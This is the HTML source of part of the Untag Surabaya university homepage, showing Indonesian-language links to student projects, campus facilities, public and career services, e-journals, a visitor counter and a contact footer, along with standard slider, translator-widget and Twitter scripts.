                               
                                <li class="purchase"><div class="button-wrap"><a href="http://untag-sby.ac.id/kategori-23-.html" class="medium-button button"><span>Semua Artikel</span></a></div></li>
                            </ul>
                        </div>
                         <div class="four columns omega">
                        	<ul class="pricing">	
                            	<li class="title">Hasil Karya</li>
                                <li class="price">
                                	<li><p><b><a href='berita-1090-ukm-sinematografi-graha-sinema-untag-surabaya-dalam-satu-bulan-garap-tiga-film-pendek-.html' data-toggle='tooltip' data-placement='right' title='
Unit Kegiatan Mahasiswa sinematografi Graha Sinema Universitas 17 Agustus 1945 Surabaya berhasil menggarap tiga judul film dalam satu bulan yakni film Spesies, Brielle, dan Workaholic. Tujuan dari ...'>UKM Sinematografi Graha Sinema Untag Surabaya dalam Satu Bulan Garap Tiga Film Pendek </a></b></p></li><li><p><b><a href='berita-1059-mahasiswa-fe-adu-kreativitas-pembuatan-hantaran-pernikahan-.html' data-toggle='tooltip' data-placement='right' title='

Awal November 2015, sebanyak
200 Mahasiswa Pengantar Ekonomi Bisnis, Fakultas Ekonomi Untag&nbsp; Surabaya beradu kreatifitas dalam membuat
hantaran pernikahan dengan bahan utama kardus, koran ...'>Mahasiswa FE Adu Kreativitas Pembuatan Hantaran Pernikahan </a></b></p></li><li><p><b><a href='berita-904-mahasiswa-teknik-informatika-untag-surabaya-membuat-aplikasi-maturity-model-berbasis-website.html' data-toggle='tooltip' data-placement='right' title='
Dwi Johan Maliono dan Abdul Ajis Setiawan mahasiswa jurusan Teknik Informatika Fakultas Teknik (FT) UNTAG
Surabaya membuat Aplikasi Maturity Model
Berbasis Website. Aplikasi ini untuk mempermudah ...'>Mahasiswa Teknik Informatika UNTAG Surabaya Membuat Aplikasi Maturity Model Berbasis Website</a></b></p></li>	
                                </li>
                                
                                <li class="purchase"><div class="button-wrap"><a href="http://untag-sby.ac.id/kategori-36-.html" class="medium-button button"><span> Semua Hasil Karya</span></a></div></li>
                            </ul>
                        </div>
							
							
                            
						
                           
                            <div class="clear"></div>
                          
						<!-- -->	
						<div class="two-thirds column alpha">
                            	<div class="title-wrapper">
                                    <div class="section-title">
                                        <h4 class="title">Lain-lain</h4>
                                    </div>
                                    <span class="divider"></span>
                                    <div class="clear"></div>
                                </div>
                                <ul class="accordion" id="1">
                                    <li>
                                        <div class="parent first">
                                            <h6><div class="accordion-caption"></div>Fasilitas</h6>
                                        </div>
                                        <div class="tcontent">
											   <ol>                                         
											    <li><a href="statis-27-programbeasiswa.html">Program Beasiswa</a>
											    <li><a href="statis-29-gedung&fungsi.html">Gedung & Fungsi</a>
											    <li><a href="statis-30-ruangkuliah.html">Ruang Kuliah</a>
											    <li><a href="statis-31-ruangseminar.html">Ruang Seminar</a>
											    <li><a href="statis-32-ruangserbaguna.html">Ruang Serbaguna</a>
											    <li><a href="statis-33-multifunctionhall.html">Multifunction Hall</a>
											    <li><a href="statis-34-perpustakaan.html">Perpustakaan</a>
											    <li><a href="statis-35-laboratoriumdanstudio.html">Laboratorium & Studio</a>
											    <li><a href="statis-36-saranaseni&olahraga.html">Sarana Seni & Olahraga</a>
											    <li><a href="statis-37-bookstore.html">Bookstore</a>
											    <li><a href="statis-38-layanankesehatan.html">Layanan Kesehatan</a>
											    <li><a href="statis-39-layanandonordarah.html">Layanan Donor Darah</a>
											    <li><a href="statis-40-kantorpos.html">Kantor Pos</a>
											    <li><a href="statis-41-bankdanatm.html">Bank & ATM</a>
											    <li><a href="statis-42-kantin.html">Kantin</a>
											    <li><a href="statis-43-masjidkampus.html">Masjid Kampus</a>
											    <li><a href="statis-44-hotspotarea.html">Hotspot Area</a>
											    <li><a href="statis-45-pojokbursaefekindonesia.html">Pojok Bursa Efek Indonesia</a>
												</ol>

                                        </div>
                                    </li>
                                    <li>
                                        <div class="parent">
                                            <h6><div class="accordion-caption"></div>Layanan Masyarakat</h6>
                                        </div>
                                        <div class="tcontent">
												<ol>                                       
													<li><a href="statis-46-pusatlayananbahasa.html">Pusat Layanan Bahasa</a>
												    <li><a href="http://upkp.untag-sby.ac.id">Pelayanan & Konsultasi Psikologi</a>
												    <li><a href="statis-50-konsultasi&bantuanhukum.html">Konsultasi & Bantuan Hukum</a>
												    <li><a href="statis-52-persewaan.html">Persewaan</a>
												    <li><a href="statis-39-layanandonordarah.html">Layanan Donor Darah</a>
												    <li><a href="statis-51-layanankesehatan.html">Layanan Kesehatan</a>
												    <li><a href="#">Blog Untag</a>
												    <li><a href="statis-47-kursusbahasakorea.html">Kursus Bahasa Korea</a>
												    <li><a href="statis-48-workshopmanufaktur.html">Workshop Manufaktur</a>
												    <li><a href="statis-53-pendidikanprofesiadvokat.html">Pendidikan Profesi Advokat</a>
												    <li><a href="statis-54-transportasikesehatan.html">Transportasi Kesehatan</a>
												</ol>
                                        </div>
                                    </li>
                                    <li>
                                        <div class="parent">
                                            <h6><div class="accordion-caption"></div>Layanan Karir</h6>
                                        </div>
                                        <div class="tcontent">
                                        
<ol>                                       
	<li><a href="http://cc.untag-sby.ac.id">Konseling Karir</a>
    <li><a href="http://jpc.untag-sby.ac.id">Lowongan Pekerjaan</a>
</ol>	

                                        </div>
                                    </li>
									
									
									 <li>
                                        <div class="parent">
                                            <h6><div class="accordion-caption"></div>Download</h6>
                                        </div>
                                        <div class="tcontent">
                                        
<ol>                                       
	<li><a href="statis-20-logodancdruntag.html">Logo dan CDR Universitas 17 Agustus 2015</a>

</ol>	

                                        </div>
                                    </li>
									
									
															 <li>
                                        <div class="parent">
                                            <h6><div class="accordion-caption"></div>Daftar Email</h6>
                                        </div>
                                        <div class="tcontent">
                                        
<ol>                                       
	<li><a href="statis-21-daftaremaildosenfisip.html">Daftar Email Dosen Fisip</a>
	<li><a href="statis-22-daftaremaildosenfakultasekonomi.html">Daftar Email Dosen Ekonomi</a>
	<li><a href="statis-23-daftaremaildosenfakultashukum.html">Daftar Email Dosen Fakultas Hukum</a>
	<li><a href="statis-24-daftaremaildosenfakultasteknik.html">Daftar Email Dosen Teknik</a>
	<li><a href="statis-25-daftaremaildosenfakultaspsikologi.html">Daftar Email Dosen Psikologi</a>
	<li><a href="statis-26-daftaremaildosenfakultassastra.html">Daftar Email Dosen Sastra</a>


</ol>	

                                        </div>
                                    </li>	
									
									
                                </ul>
							</div>
                            <div class="one-third column omega">
                            	<div class="title-wrapper">
                                    <div class="section-title">
                                        <h4 class="title">Statistik</h4>
                                    </div>
                                    <span class="divider"></span>
                                    <div class="clear"></div>
                                </div>
                                
								  <div class="callout intext">
									<p align=center><img src='hitungan-statistik/2.png' alt='2'><img src='hitungan-statistik/5.png' alt='5'><img src='hitungan-statistik/7.png' alt='7'><img src='hitungan-statistik/8.png' alt='8'><img src='hitungan-statistik/4.png' alt='4'><img src='hitungan-statistik/3.png' alt='3'><img src='hitungan-statistik/0.png' alt='0'> </p>
										
											<div class='content'>	<p align=left>	
													<img src=hitungan-statistik/hariini.png> Pengunjung hari ini </td><td> : 132 <br/>
													<img src=hitungan-statistik/total.png> Total pengunjung </td><td> : 583301  <br/>
													<img src=hitungan-statistik/hariini.png> Hits hari ini </td><td> : 265 <br/>
													<img src=hitungan-statistik/total.png> Total Hits </td><td> : 2578430 <br/>
													<img src=hitungan-statistik/online.png> Pengunjung Online </td><td> : 4 <br/> <br/><br/>
													</p>
											</div>		
																			
                            </div>
							
                            
                            <!--batas-->
</div>
 <div class="sixteen columns">
                        <div class="title-wrapper">
                            <div class="section-title">
                                <h4 class="title">UNTAG <strong>KITA</strong></h4>
                            </div>
                            <span class="divider"></span>
                            <div class="clear"></div>
                        </div>
                        <div class="four columns alpha">
                            <ul class="pricing">
                                <li class="title">KERJASAMA</li>
                                <li class="price">
                                    
                                  Kerjasama yang pernah dijalin dan karya kerjasama
                                   
                                
                                </li>
                              
                                <li class="purchase"><div class="button-wrap"><a href="statis-57-hasilkerjasama.html" class="medium-button button"><span>Klik Disini!</span></a></div></li>
                            </ul>
                        </div>
                         <div class="four columns">
                            <ul class="pricing">
                                <li class="title">PENGHARGAAN</li>
                                <li class="price">
                                    
                                   Kumpulan karya mahasiswa & dosen menarik versi mass media
                                </li>
                                
                                <li class="purchase"><div class="button-wrap"><a href="statis-60-penghargaan.html" class="medium-button button"><span>Klik Disini!</span></a></div></li>
                            </ul>
                        </div>
                        <div class="four columns">
                            <ul class="pricing">
                                <li class="title">PRESTASI</li>
                                <li class="price">
                                    
                                   Capaian prestasi lembaga, mahasiswa, dosen dan karyawan
                                </li>
                                
                                <li class="purchase"><div class="button-wrap"><a href="statis-59-halamanprestasi.html" class="medium-button button"><span>Klik Disini!</span></a></div></li>
                            </ul>
                        </div>
                        <div class="four columns omega">
                            <ul class="pricing">
                            
                                <li class="title">ALUMNI</li>
                                <li class="price">
                                    
                                   Komunitas Alumni Universitas 17 Agustus 1945 Surabaya
                                </li>
                                
                                <li class="purchase"><div class="button-wrap"><a href="http://ika.untag-sby.ac.id/" target="_blank" class="medium-button button"><span>Klik Disini!</span></a></div></li>
                            </ul>
                        </div>
                         
                        <div class="clear"></div>
                     
                        
                       
                    </div>
								
								
								
                            </div>
                            <div class="clear"></div>
                            <!--Batas-->

                            <div class="callout intext">	
								<div class="alpha twelve columns">
									<div class="content">
										<h3>We are...<br> Google Partner Indonesia</h3>
									</div>
								</div>		
									 <div class="omega four columns">
                                   		<div class="intext-button">
											<a href="http://google.untag-sby.ac.id"><img src="images/Google.png" width="60%" height="10%" ></a>
										</div>
									</div>	
							</div>
							<br><br><br><br>
							 <div class="clear"></div>

                            <div class="callout intext">
                                <div class="alpha twelve columns">
                                	<div class="content">
                                        <h5>SISTEM INFORMASI AKADEMIK UNTAG</h5>
                                        <p class="subtitle">Sistem Informasi akademik yang telah terintegrasi.</p>
										<h5>PMB ONLINE</h5>
                                        <p class="subtitle">Pendaftaran mahasiswa secara online.</p>
                                        <h5>Sistem Verifikasi Ijazah secara Elektronik </h5>
                                        <p class="subtitle">Verifikasi penomoran ijazah secara elektronik sesuai kebutuhan ristekdikti (PIN).</p>
                                        <ul>
                                        <!-- <li><img src="images/pmbbaru.jpg" class="scale-with-grid"></li> -->
                                         
                   
                                        <li><a href="statis-17-pengumumuanperwaliandosenwali.html">Informasi Alur Dosen Wali</a><br/>
							            <li><a href="statis-18-pengumumuanperwalianmahasiswa.html">Informasi Perwalian Mahasiswa</a><br/>
							
                            <ul>
                                 	</div>
                                </div>
                                
                                <div class="omega four columns">
                                   <div class="intext-button">
                                   		<a href="http://sim.untag-sby.ac.id" class="big-button"><span>SIMUNTAG</span></a>
                                   		<a href="http://pmb.untag-sby.ac.id" class="big-button"><span>PMB</span></a>
                                   		<a href="http://sivil.untag-sby.ac.id" class="big-button"><span>SIVIL</span></a>
                                   </div>
                                </div>
                                
                                <div class="clear"></div>
                            </div>
                            <div class="title-wrapper">
                                <div class="section-title">
                                    <h4 class="title">E-<strong>Journal</strong> & <strong>Tautan Lain</strong></h4>
                                </div>
                                <ul class="slidecontrols">
                                    <li><a href="#clientSlider" class="next">Next</a></li>
                                    <li><a href="#clientSlider" class="prev">Prev</a></li>
                                </ul>
                                    <span class="divider"></span>
                            	<div class="clear"></div>
                            </div>
                        </div>
                        
                        <div class="clients columns sixteen slidewrap2">
                            <ul class="slider carousel" id="clientSlider">
                                <li class="slide">
                                    <div class="client alpha">
                                        <a href="http://jurnal.untag-sby.ac.id/" target="_blank"><img id="transparent" src="templates/Untag-sBy_1945_17/images/jurnal-lokal.jpg" /></a>
                                    </div>
                                    <div class="client beta">
                                        <a href="http://warta17agustus.com/"target="_blank"><img id="transparent" src="templates/Untag-sBy_1945_17/images/warta17y.jpg" /></a>
                                    </div>
                                    <div class="client delta">
                                        <a href="http://garuda.dikti.go.id/"target="_blank"><img id="transparent" src="templates/Untag-sBy_1945_17/images/garuda.jpg" /></a>
                                    </div>
                                    <div class="client omega">
                                       <a href="http://search.ebscohost.com/"target="_blank"><img id="transparent" src="templates/Untag-sBy_1945_17/images/ebsco.jpg" /></a>
                                    </div>
                                </li>
                                
                                <li class="slide">
                                    <div class="client alpha">
                                       <a href="http://search.proquest.com/"target="_blank"><img id="transparent" src="templates/Untag-sBy_1945_17/images/proquest.jpg" /></a>
                                    </div>
                                    <div class="client beta">
                                       <a href="http://infotrac.galegroup.com/default"target="_blank"><img id="transparent" src="templates/Untag-sBy_1945_17/images/cengage.jpg" /></a>
                                    </div>
                                    <div class="client delta">
                                        <a href="http://gallery.untag-sby.ac.id/"target="_blank"><img id="transparent" src="templates/Untag-sBy_1945_17/images/untag_gallery.jpg" /></a>
                                    </div>
                                    <div class="client omega">
                                       <a href="http://emeraldinsight.com/"target="_blank"><img id="transparent" src="templates/Untag-sBy_1945_17/images/emerald.jpg" /></a>
                                    </div>
                                </li>
                            </ul>
                            
                        </div>  
                        <div class="clear"></div>
                        <div class="sixteen columns">
                       		<span class="hr remove-bottom"></span>
                           <!--  <blockquote class="standard bottom">
                                "Making the simple complicated is commonplace; making the complicated simple, awesomely simple, that's creativity" <br />- Charles Mingus
                            </blockquote> -->
                        </div>
                    </div>
                </div>
            </div>
			</div>
			


      

		
                <div class="footer style-2">
            	<div class="background"><div class="stitch"></div></div>
                <div class="foot-nav-bg"></div>
            	<div class="content">
                    <div class="patch"></div>
                    <div class="blur"></div>
                    <div class="pattern">
                        <div class="container">
                        	<div class="stitch"></div>
                            <div class="sixteen columns">
                                <div class="first column alpha">
                                <div></div>
                                    <div class="left">
                                       
                                        <h5>Alamat :</h5>
                                        <p>
                                            Kampus : Jl. Semolowaru 45 Surabaya 60118.<br />
											Telp : 031-5931800, Fax : 031-5927817<br />
											Email : humas@untag-sby.ac.id.
                     					</p>
                                        <div id='MicrosoftTranslatorWidget' class='Dark' style='color:white;background-color:#555555'></div>
                        <div id='MicrosoftTranslatorWidget' class='Dark' style='color:white;background-color:#555555'></div>
                        <script type='text/javascript'>setTimeout(function(){{var s=document.createElement('script');s.type='text/javascript';s.charset='UTF-8';s.src=((location && location.href && location.href.indexOf('https') == 0)?'https://ssl.microsofttranslator.com':'http://www.microsofttranslator.com')+'/ajax/v3/WidgetV3.ashx?siteData=ueOIGRSKkd965FeEGM5JtQ**&ctf=False&ui=true&settings=manual&from=id';var p=document.getElementsByTagName('head')[0]||document.documentElement;p.insertBefore(s,p.firstChild); }},0);</script>
                                        <!-- <p class="extra">
                                        <style>
										.bulat{
											border-radius:20px 20px 20px 20px;
											opacity:1;
											width:250px;
											height:200px;
											}

										</style>
                                           <img class ="bulat" src="images/phenma-2016.jpeg" width='80%'></a>
                                        </p> -->
                                    </div>
                                </div>
                                <div class="column ct">
                                    <h5>Layanan Karir:</h5>
                                  <p><a href="http://jpc.untag-sby.ac.id/">Konseling Karir</a><br />
								  <a href="http://jpc.untag-sby.ac.id/">Lowongan Pekerjaan</a></p><br/>
								  
								   <!-- <h5>Recent Tweets:</h5>
                                    <ul class="twitter" id="twitter_update_list"><li>Twitter is loading</li></ul>
									
                                    <a class="twitter-timeline"
                                      data-widget-id="648340138188103680"
                                      href="https://twitter.com/UntagSurabaya"
                                      data-tweet-limit="3">
                                    Tweets by @UntagSurabaya -->

                                </div>
                                <div class="last column omega">
                                    <!-- <h5>Join our Mailing List</h5>
                                    
                                    <div class="input-wrapper">
                                        <input type="text" placeholder="Email..." id="email" name="email" />
                                    </div> -->
                                   <!--  <div class="right">
                                    	<a href="#" class="button color"><span>Join</span></a>
                                    </div> -->
                                    <div class="clear"></div>
                                    <span class="hr"></span>
                                    <h5>Stay in Touch</h5>
                                    <ul class="sm foot">
                                <!-- <li class="facebook"><a href="https://www.facebook.com/official.untag.surabaya">Facebook</a></li>
                                <li class="twitter"><a href="https://twitter.com/UntagSurabaya">Twiter</a></li>
                                <li class="instagram"><a href="https://www.instagram.com/untagsurabaya/">Instagram</a></li>
                                <li class="youtube"><a href="https://www.youtube.com/untagsurabaya/">Youtube</a></li>-->
                                <a href="https://www.facebook.com/official.untag.surabaya"> 
                                <img src="templates/Untag-sBy_1945_17/images/medsos/fb.png"height="20" width="20"/>
                                </a>
                                 <a href="https://twitter.com/UntagSurabaya"> 
                                 <img src="templates/Untag-sBy_1945_17/images/medsos/twitter.png"height="20" width="20"/>
                                </a>
                                  <a href="https://www.youtube.com/untagsurabaya"> 
                                 <img src="templates/Untag-sBy_1945_17/images/medsos/youtube.png"height="20" width="20"/>
                                </a>
                                  <a href="https://www.instagram.com/untagsurabaya"> 
                                 <img src="templates/Untag-sBy_1945_17/images/medsos/instagram.png"height="20" width="20"/>
                                </a>


                                       
                                    </ul>
                                </div>
                            </div>
                            <div class="clear"></div>
                        </div>
						
						<!-- <div id='MicrosoftTranslatorWidget' class='Dark' style='color:white;background-color:#555555'></div>
                        <div id='MicrosoftTranslatorWidget' class='Dark' style='color:white;background-color:#555555'></div>
                        <script type='text/javascript'>setTimeout(function(){{var s=document.createElement('script');s.type='text/javascript';s.charset='UTF-8';s.src=((location && location.href && location.href.indexOf('https') == 0)?'https://ssl.microsofttranslator.com':'http://www.microsofttranslator.com')+'/ajax/v3/WidgetV3.ashx?siteData=ueOIGRSKkd965FeEGM5JtQ**&ctf=False&ui=true&settings=manual&from=id';var p=document.getElementsByTagName('head')[0]||document.documentElement;p.insertBefore(s,p.firstChild); }},0);</script> -->
						
    
						
                        <div class="sixteen columns alpha omega">
                        	<div class="foot-nav-bg"></div>
                            <div class="foot-nav">
                                <div class="copy">
                                    Copyright © 2015-2016 Badan Sistem Informasi. By Empirical Themes
                                </div>
                                <div class="nav">
                                    <a href="http://old.untag-sby.ac.id/">Old.Untag</a>
                                    <a href="http://untag-sby.ac.id/m">Mobile Version</a>
                                    <a href="http://untag-sby.ac.id">Home</a>
                                    <a href="statis-3-visimisi.html">Profile</a>
                                    <a href="hubungi-kami.html">Contact Us</a>
                                    <a href="#">Terms of Use</a>
                                    <a href="#">Privacy</a>
									
                               	</div>
                            </div>
                        </div>
						
						
                    </div>
                </div>
            </div>
    </div>
        
    <script type="text/javascript">
    <!--
        $(window).load(function(){
            $(".nivo.hide").fadeIn(1000);
            // Setup Slider
            $('.nivo').nivoSlider({
                effect: 'random', // Specify sets like: 'fold,fade,sliceDown'
                slices: 15, // For slice animations
                boxCols: 8, // For box animations
                boxRows: 4, // For box animations
                animSpeed: 500, // Slide transition speed
                pauseTime: 6000, // How long each slide will show
                startSlide: 0, // Set starting Slide (0 index)
                directionNav: true, // Next & Prev navigation
                controlNav: false, // 1,2,3... navigation
                controlNavThumbs: false, // Use thumbnails for Control Nav
                pauseOnHover: true, // Stop animation while hovering
                manualAdvance: false, // Force manual transitions
                prevText: 'Prev', // Prev directionNav text
                nextText: 'Next', // Next directionNav text
                randomStart: false, // Start on a random slide
                beforeChange: function(){}, // Triggers before a slide transition
                afterChange: function(){}, // Triggers after a slide transition
                slideshowEnd: function(){}, // Triggers after all slides have been shown
                lastSlide: function(){}, // Triggers when last slide is shown
                afterLoad: function(){} // Triggers when slider has loaded
            });
            $("a[class^='prettyPhoto']").prettyPhoto({social_tools: '' });
        });
        $(document).ready(function() {
            $('.slidewrap, .slidewrap2').carousel({
                slider: '.slider',
                slide: '.slide',
                slideHed: '.slidehed',
                nextSlide : '.next',
                prevSlide : '.prev',
                addPagination: false,
                addNav : false
            });
			$('.slide.testimonials').contentSlide();
        });
    // -->
    </script>
	
    <script type="text/javascript" src="http1234://twitter.com/javascripts/blogger.js"></script>
    <script type="text/javascript" src="http://api.twitter.com/1/statuses/user_timeline/UntagSurabaya.json?callback=twitterCallback2&count=2"></script>
	</div>
</body>

</html>